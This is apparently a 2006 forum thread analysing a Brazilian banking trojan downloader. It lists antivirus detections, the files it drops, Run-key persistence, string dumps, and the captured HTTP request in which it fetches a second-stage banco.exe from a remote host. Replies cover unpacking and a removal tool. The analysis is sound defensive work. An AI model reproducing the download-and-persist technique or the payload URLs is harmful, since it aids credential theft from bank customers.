Skip navigation.
Home

CartaoMagico Analysis

|

4ed47c2818df67c87614f3c859fa48fb

found at: http://www.csfederalismo.it/User/flash/CartaoMagico.exe
appears to be packed with PECompact2
has a microsoft word icon

AntiVir 7.3.0.21 12.27.2006 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.27.2006 no virus found
BitDefender 7.2 12.27.2006 Trojan.IM.Flooder.Delf.H
CAT-QuickHeal 8.00 12.27.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.27.2006 Trojan.Downloader.Banload-1331
DrWeb 4.33 12.27.2006 DLOADER.Trojan
eSafe 7.0.14.0 12.26.2006 Suspicious Trojan/Worm
eTrust-InoculateIT 23.73.99 12.27.2006 no virus found
eTrust-Vet 30.3.3283 12.27.2006 no virus found
Ewido 4.0 12.26.2006 Downloader.Banload.atk
Fortinet 2.82.0.0 12.27.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 4.2.1.29 12.22.2006 no virus found
Ikarus T3.1.0.27 12.27.2006 Trojan-Spy.Win32.Banker.anv
Kaspersky 4.0.2.24 12.27.2006 IM-Flooder.Win32.Delf.h
McAfee 4927 12.27.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1940 12.27.2006 a variant of Win32/TrojanDownloader.Banload.BDJ
Norman 5.80.02 12.27.2006 no virus found
Panda 9.0.0.4 12.27.2006 Suspicious file
Prevx1 V2 12.27.2006 no virus found
Sophos 4.13.0 12.26.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.137 12.27.2006 no virus found
UNA 1.83 12.27.2006 no virus found
VBA32 3.11.1 12.27.2006 IM-Worm.Win32.Delf.c
VirusBuster 4.3.19:9 12.27.2006 no virus found

connects to:

74.52.107.230 and gets /banco.exe
OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 1333 North Stemmons Freeway
Address: Suite 110
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

banco.exe is associated with https//internetcaixa.caixa.gov.br/NASApp/SIIBC/2a11c6f08b4c661eb14410ea7963b3.processaU
so maybe a brazilian bank hijacker.

creates processes
ExAlien.exe
winlogin.exe

adds files
c:\documents and settings\all users\start menu\programs\startup\exalien.exe
c:\documents and settings\username\local settings\temporary internet files\content.ie5\randomname\banco.exe
c:\windows\system32\winlogin.exe
C:\Arquivos de programas\ExAlien.exe
C:\WINDOWS\winlogin.exe

adds registry keys
hkey_local_machine\software\microsoft\windows\currentversion\run\ cartomagico
hkey_local_machine\software\microsoft\windows\currentversion\run\ exalien
These are kind of weird:

HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCC\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable

opens a browser window and connects to google

connects to

74.52.107.230 and gets /banco.exe

GET /banco.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.inovaimoveis.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 1487872
Content-Type: application/octet-stream
Last-Modified: Tue, 26 Dec 2006 22:08:21 GMT
Accept-Ranges: bytes
ETag: "1a2485b3a29c71:85b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Dec 2006 22:56:32 GMT

MZP

Then for some reason it connects to the BBC:
212.58.226.8
GET /rss/newsonline_world_edition/front_page/rss.xml HTTP/1.1
Host: newsrss.bbc.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 10 Jan 2006 06:41:43 GMT
If-None-Match: "40bf-6896d7c0"
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Wed, 27 Dec 2006 22:56:47 GMT
Server: Apache
Last-Modified: Wed, 27 Dec 2006 22:41:41 GMT
Etag: "4277-bbff3340"
Accept-Ranges: bytes
Content-Length: 17015
Cache-Control: max-age=60
Expires: Wed, 27 Dec 2006 22:57:47 GMT
Keep-Alive: timeout=10, max=52
Connection: Keep-Alive
Content-Type: application/xml

STRINGS:

00000050 00400050 0 This program must be run under Win32
00000220 00400220 0 .rsrc
00000248 00400248 0 .mackt
00001006 00401006 0 Boolean
0000101B 0040101B 0 False
00001042 00401042 0 Integer
00001082 00401082 0 Cardinal
0000109A 0040109A 0 String
000010ED 004010ED 0 TObject
000010FA 004010FA 0 TObject
0000110C 0040110C 0 System
0000111A 0040111A 0 IInterface
0000113A 0040113A 0 System
000011E1 004011E1 0 TInterfacedObject
000011F9 004011F9 0 TDateTime
000031F0 004031F0 0 SOFTWARE\Borland\Delphi\RTL
0000320C 0040320C 0 FPUMaskValue
00005454 00405454 0 kernel32.dll
00005464 00405464 0 GetLongPathNameA
000054FD 004054FD 0 Uh}U@
000056A8 004056A8 0 Software\Borland\Locales
000056C4 004056C4 0 Software\Borland\Delphi\Locales
000057ED 004057ED 0 UhHX@
00005A2B 00405A2B 0 FFF;M
000060DA 004060DA 0 odSelected
000060E5 004060E5 0 odGrayed
000060EE 004060EE 0 odDisabled odChecked odFocused odDefault
00006117 00406117 0 odHotLight
00006122 00406122 0 odInactive odNoAccel
00006137 00406137 0 odNoFocusRect
00006145 00406145 0 odReserved1
00006151 00406151 0 odReserved2

there are a TON of strings so i didnt include them all but here are some more good ones:

open
C\WINDOWS\System32\winlogin.exe
http//ww.inovaimoveis.com/banco.exe
C\WINDOWS\System32\winlogin.exe
\Software\Microsoft\Windows\CurrentVersion\Run
\winlogin.exe
\Software\Microsoft\Windows\CurrentVersion\Run
\winlogin.exe
open
http//ww.google.com/
open
C\WINDOWS\System32\winlogin.exe
http//ww.inovaimoveis.com/banco.exe
C\WINDOWS\System32\winlogin.exe
Conversa

more later,

V.

Packer

It looks like it's actually packed with PECompact2. That being the case UnPECompact won't work against it. I know there are supposed to be some OllyDbg scripts out there that will unpack it, but I don't know the URL. Anyone got a link to it/them?

-cdh

I didnt have much trouble

I didnt have much trouble dynamically unpacking it, however a first stop site for RE tools, scripts, and information is Pedram's OpenRCE. I highly recommend it, Pedram really knows what hes doing. I also recommend his and Ero's RE malware class at blackhat if you can afford it.

Here is a link to the ollyscripts.

http://www.openrce.org/downloads/browse/OllyDbg_OllyScripts

V.

yeh

A tipical brazilian

A tipical brazilian banker.
We develop a tool to remove this kind of malware, very common in Brazil, see:
http://linhadefensiva.uol.com.br/forum/index.php?showtopic=15496&st=0&#entry73404

Fabio Assolini
Security Coordenator
www.linhadefensiva.org

Thanks!

Thanks alot for the response. Thats very useful information.

Please feel free to contribute any time.

V.